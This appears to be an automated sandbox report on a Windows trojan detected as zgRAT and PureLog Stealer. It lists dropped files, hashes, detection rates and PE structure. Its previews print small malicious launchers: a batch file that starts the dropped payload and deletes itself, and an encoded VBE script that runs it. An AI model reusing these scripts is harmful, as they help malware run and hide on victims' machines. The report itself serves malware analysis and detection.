                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):25
                                                                                  Entropy (8bit):4.373660689688184
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:IzbMLR3Uim:ObMl3U9
                                                                                  MD5:BC85B166DBF6DE71578060BC34F2ED22
                                                                                  SHA1:31BCA4C9868169F6591BCD08E22777AA157D7674
                                                                                  SHA-256:BDF6D98F71FA5B7D390C6A8CD128CD7AA5C7F6A1E26B1E1AD8DC655BEE2C3A62
                                                                                  SHA-512:85152D00B781BB572B3C4351C495A361153B7C58DEC8B09CB721A1A09B7A73F7A3641C51A9F3B15785E56B755003D9BE7472A87D7528ADAD1743CFD4B1D18A5D
                                                                                  Malicious:false
                                                                                  Preview:whRVciLjkNK7fr4v77gGqGmtb
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):169
                                                                                  Entropy (8bit):5.143507364906635
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mwqWyAJAeJJbRNSBktKcKZG1t+kiE2J5xAIgT59zKn:hCRLuVFOOr+DE0yA7NSKOZG1wkn23fgK
                                                                                  MD5:A7A9458247350E51F854DD28C7E2D4FB
                                                                                  SHA1:668444478B642951D2C92501AAE9ABA51242FE9B
                                                                                  SHA-256:E58D6299CB659804BD2B28D28EFFB12E90CCD0F39BC8FE295415050C32CF2727
                                                                                  SHA-512:979F5C0DAF78D0B44CB4C1F8AE30D3354D128E0F5F874B369299170C5E127EB4762626464C2B0CA7276E6CE3DEF66C7E4F6E7F9E6B450F51C0BD8492D15C1DAE
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\mshypercomponentSavesdll\agentFont.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\z0MvDYgz73.bat"
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22016
                                                                                  Entropy (8bit):5.41854385721431
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Etqq32Yuw4.exe, Detection: malicious
                                                                                  • Filename: KzLetzDiM8.exe, Detection: malicious
                                                                                  • Filename: f3I38kv.exe, Detection: malicious
                                                                                  • Filename: XNPOazHpXF.exe, Detection: malicious
                                                                                  • Filename: 9FwQYJSj4N.exe, Detection: malicious
                                                                                  • Filename: CPNSQusnwC.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: hjgesadfseawd.exe, Detection: malicious
                                                                                  • Filename: adjthjawdth.exe, Detection: malicious
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.519109060441589
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22016
                                                                                  Entropy (8bit):5.41854385721431
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.519109060441589
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (978), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):978
                                                                                  Entropy (8bit):5.913722445226472
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:/kJfbPL65SW58lYNP5wPGJotHljlZJw/fTB3utYJwh2aelVHV4e:/obDNmNPGP9PlsfTB3uuJwFIVHV4e
                                                                                  MD5:176794E1AC002B6E3176416929D45295
                                                                                  SHA1:DF2F1CD1AFB0CEB04202907707BAC58B930E97DA
                                                                                  SHA-256:8D0F567BE65A2C84FC17DE67C616A40076C9953698BE17FFACA0B253F1C074F0
                                                                                  SHA-512:BAAF2B8C3B81FBDF9D0CE9A116E7F34755A8B21050F0D7ECF2832D802185EBC123CF7E856D1D611FDC91074AD2F0665676D5A38943228F872F2DAC2DAF3211BF
                                                                                  Malicious:false
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (318), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):318
                                                                                  Entropy (8bit):5.830040925012662
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:DEm6zjXzvlZu2AXgB1aYUwRr2VuAyr9oV5tMZrrHhhv/Hvg8J4An:x6zLGv01tEuPr9oV50B/PgS4An
                                                                                  MD5:4A0C361FAE9E6BC63378B6A485AB2A22
                                                                                  SHA1:93D52E637449846BE7E8AD7A55136455746C9B5F
                                                                                  SHA-256:9CFF5E2E813993389E131F043536EE78BE8BAF2E3AD253BDDCB2B3E00218ACF6
                                                                                  SHA-512:EB33CB5CD6BFBB74B93814AEF3E70DBF5E21D9CA86B97413AD49FF8AA2573AA1ED9AD20AB7A1C8FD24BD5A2383C32FD893DC882126AABE45384C45DA77FF12A5
                                                                                  Malicious:false
                                                                                  Preview:3uqdu4jYoGGFuGwDO4t9OtJ91W73jocTWYvR6SIM2Yo1BJzN7E8JdFEKlqmY6pyAnwsVUeH6vgGzER8rhu5fqTzQUlqPpuQNknNObd2d6BX69OFTr50MtTUU6bBty1QAQ3PaEuQD1cjo52RFfWiu4DdRT3S9cJpEvWqG8pP7pxVRtqZDK5ObTgGMZ8HKcQkswe3iMLH0HkFHsLhmeOzh4NuOQdq9hEfYMmePx018yXUtb9dObfqNbDxjtoStfHSCFq5FrSynX0th3BxQ9ciCXR6Iz5fJhIdqESnuEYgJqC0kUQps1CtCjQoyuwQvwp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):81
                                                                                  Entropy (8bit):5.1635017002285215
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:o3gACjQ8Y69AUbFRiqWyAJAeJqbRNf5UCAn:owACjvY+AUJRWyA8Nf5Kn
                                                                                  MD5:7318BE9B65C2BF66CB3E8FF640112F84
                                                                                  SHA1:D6BE0AD9E53C30D1EC08CF221AEA38AAA9B3D03A
                                                                                  SHA-256:946525ADEA7B1163EF9801B9CED0AF00096159E968C3CCCF3FE9F85003994B2B
                                                                                  SHA-512:8458BE178B0943F95DF99BF70ADD5F1A8BE1727B12B387CB38F3770145401E06E4D3733BC954EAA149054BF3F360B7B647CDF153C2CAAABD9736286FC6ACD0F1
                                                                                  Malicious:false
                                                                                  Preview:%hRb%%ABhrVuBYExzWT%..%qAw%"C:\mshypercomponentSavesdll/agentFont.exe"%cfZTqIsSp%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (761), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):761
                                                                                  Entropy (8bit):5.9078229661703014
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:bU5qgG29xdYRhqnk9ER6hYtp9Nl6xNiQjyRUkYSPmt28HgWlmy04BODy9/eS7OpY:m9x6RJYgxNMuZHRlm1lDO56pYt
                                                                                  MD5:068D08551BBE28F6EF65E0ABC038BB67
                                                                                  SHA1:058C3357928A436FDD0B7EBDE8304FC14CB746F2
                                                                                  SHA-256:65EE79EFDAEF1FF09CAC659D491D7648EA9C17D49C5F411BEE975B91F2F58916
                                                                                  SHA-512:109890238E2122EC23BDFD2B5A45A0445A0454505C72BB6B7D3353A6DBF92E21B5D51A672C4456BDDA671EFB1F90EF78A608E244EEE522E8B71214DF16F4C454
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):212
                                                                                  Entropy (8bit):5.711197580899429
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:GUwqK+NkLzWbHnPv7qK+NkLzWHOuynCWHLjEfWs:GlMCzWLnP/MCzWurCWHLQf1
                                                                                  MD5:06FA0952379DC4DB1439AF29A13D89BE
                                                                                  SHA1:A36AF1795B7948305940D6542D35F6D6DB038E6A
                                                                                  SHA-256:CFE1D4E4F8C609281567BCBA5CC5117FA957D53721B817F979092DEC7FC44852
                                                                                  SHA-512:A4E549A142C2763C9AA2650D65A2577EE92BB63A133D10E0B3FE6BCE3F43DD7230D5D0FC711A5DA84F41EAD8EC34557940659CF7C773A9BDADA3933812F285BF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Preview:#@~^uwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~rZlzsd4X2.D1W:aW.nxD?C\./[s^zz8WoUjwx0i3lAwR8lOEBPT~,Wl^/nZDwAAA==^#~@.
                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):502
                                                                                  Entropy (8bit):4.617849230514524
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:PQ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:6dUOAokItULVDv
                                                                                  MD5:26EAE6FEED7DAF2C06D3CCABF837F597
                                                                                  SHA1:2F0BAD84BE1209EDAFF7615FDB240272019AD98A
                                                                                  SHA-256:230CF49794E5B27AB9828A56B384D85EB8D2AE5D465695D822D89778B53C319B
                                                                                  SHA-512:0C8E870DEBDDEAB3E3B71BBA23E63F49307A2D33990D9BAF850DF0660B0AB16EC61F90191B4C71FCA3787B0CB3BCDAE9C0DDAC04756800CC7E5A0B30D008E141
                                                                                  Malicious:false
                                                                                  Preview:..Pinging 960781 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                  Entropy (8bit):7.858360008225366
                                                                                  TrID:
                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:QH67JSdZWl.exe
                                                                                  File size:1'898'695 bytes
                                                                                  MD5:c8228b107dfad48c1a7de8147fa1f6e4
                                                                                  SHA1:7f6d1d3c48d891cccc4b0dd57504db216ac681a8
                                                                                  SHA256:8d0c8954abeaa3c75c922544e9798171de09868a3a1f9300e07465672ada3da4
                                                                                  SHA512:6bf0be5fab599f1e4380353d438855688602287d3a9c8904ffc6b6dfa63987658689e5cb9d14d1dc54fa0b4ca9c6979936b9014eb07b5940c4913930d06cdedd
                                                                                  SSDEEP:49152:ac6VI9Ja0rGCSO0uUUhMtuGTiWun+u2a5auBPLpp/W:94ILTpS5uatuGTHun+u2urp/W
                                                                                  TLSH:95950209E7E808FCE4B7B578DAA24902E7763C4E0771D68F13A456661F273909D3E722
                                                                                  Icon Hash:90cececece8e8eb0
                                                                                  Entrypoint:0x1400327e0
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x140000000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x676A81F5 [Tue Dec 24 09:42:13 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:2
                                                                                  File Version Major:5
                                                                                  File Version Minor:2
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:2
                                                                                  Import Hash:e3fd64aa4446c9293cbc88d0f6cebf06
                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                   Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                   IMAGE_DIRECTORY_ENTRY_EXPORT          0x598f0          0x34          .rdata
                                                                                   IMAGE_DIRECTORY_ENTRY_IMPORT          0x59924          0x50          .rdata
                                                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6f000          0x46e3        .rsrc
                                                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x6a000          0x30d8        .pdata
                                                                                   IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC       0x74000          0x964         .reloc
                                                                                   IMAGE_DIRECTORY_ENTRY_DEBUG           0x53470          0x54          .rdata
                                                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                   IMAGE_DIRECTORY_ENTRY_TLS             0x53680          0x28          .rdata
                                                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x4b1a0          0x140         .rdata
                                                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                   IMAGE_DIRECTORY_ENTRY_IAT             0x48000          0x518         .rdata
                                                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x58884          0x120         .rdata
                                                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                   IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                                   Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                                                                   .text   0x1000           0x4637e       0x46400   2d75b6208f53f098cd697a3796359288  False     0.5381971474644128   data       6.476135798896648   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                   .rdata  0x48000          0x12a4c       0x12c00   18f7a8933dfad9219b4ddc437f39d39f  False     0.4498697916666667   data       5.263488930105173   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                   .data   0x5b000          0xe81c        0x1a00    afb3f158e6601be588ee0ec88917fdd1  False     0.28260216346153844  data       3.250809205040315   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                   .pdata  0x6a000          0x30d8        0x3200    d69553281fdb2b3c5212f4c1f7e65c01  False     0.487734375          data       5.5447729633031315  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                   .didat  0x6e000          0x368         0x400     9d64d4d9c61f860eed9f809474f3e3d6  False     0.2568359375         data       3.016152519023592   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                   .rsrc   0x6f000          0x46e3        0x4800    ae376172c8caea26837114196adb9e6b  False     0.5884874131944444   data       6.070664574402543   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                   .reloc  0x74000          0x964         0xa00     423b61d133b6720c4ce879131914e12a  False     0.528125             data       5.335617278018671   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                   Name         RVA      Size    Type                                                        Language  Country        ZLIB Complexity
                                                                                   PNG          0x6f4c4  0x966   PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced   English   United States  1.0045719035743974
                                                                                   PNG          0x6fe2c  0x123f  PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced  English   United States  0.9700278312995076
                                                                                   RT_DIALOG    0x7106c  0x286   data                                                        English   United States  0.5092879256965944
                                                                                   RT_DIALOG    0x712f4  0x13a   data                                                        English   United States  0.60828025477707
                                                                                   RT_DIALOG    0x71430  0xec    data                                                        English   United States  0.6991525423728814
                                                                                   RT_DIALOG    0x7151c  0x12e   data                                                        English   United States  0.5927152317880795
                                                                                   RT_DIALOG    0x7164c  0x338   data                                                        English   United States  0.45145631067961167
                                                                                   RT_DIALOG    0x71984  0x252   data                                                        English   United States  0.5757575757575758
